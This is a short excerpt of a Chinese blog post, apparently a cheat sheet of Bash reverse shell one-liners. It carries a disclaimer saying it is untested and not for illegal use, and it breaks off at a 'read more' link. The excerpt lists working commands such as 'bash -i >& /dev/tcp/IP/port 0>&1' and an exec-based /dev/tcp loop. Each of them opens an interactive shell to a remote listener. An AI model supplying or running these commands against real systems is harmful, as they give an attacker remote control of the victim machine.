摘要: 未测试。请勿用于非法用途 Bash TCP bash -i >& /dev/tcp/IP/port 0>&1 /bin/bash -i > /dev/tcp/IP/port 0<& 2>&1 exec 5<>/dev/tcp/IP/port;cat <&5 | while read line; do 阅读全文
posted @ 2020-12-15 14:30 江流's 阅读(127) 评论(0) 推荐(0)